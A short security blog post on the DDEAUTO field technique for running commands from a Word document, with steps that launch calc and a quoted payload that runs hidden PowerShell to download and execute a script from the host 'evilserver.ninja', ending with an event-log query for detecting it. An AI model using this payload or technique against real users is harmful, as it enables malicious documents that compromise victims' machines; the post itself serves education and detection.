Code Execution in MSWord

I read about a cool way to get code execution in MSWord from SensePost’s Saif El-Sherei and later read about a way to detect it from SecurityForRealPeople’s David Longenecker. Saif does a good job of explaining the steps in his post, but the basic setup is:

  1. Insert tab -> Quick Parts -> Field
  2. choose =(Formula) and click ok
  3. right-click on !Unexpected End of Formula and choose Toggle Field Codes
  4. change the Field Code to contain:   <p> {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}
  5. save the document and then open it
  6. you will get two prompts to click through and then calc will open

The possibilities here are endless. Saif’s proof of concept video in the post uses powershell to download an empire launcher

  { DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

I think depending on the access I had on the machine, I would change the syntax to be more stealthy, so the popup doesnt raise any red-flags with the user. Execution is lots of fun, but improving defenders and showing them how to find the cool techniques is really where the money is made. I drilled down on this particular code execution with the Powershell command below. It will differ with environment and context:

  Get-EventLog -Log "OAlerts" -Newest 5 | where {$_.eventID -eq 300} | format-list -Property Message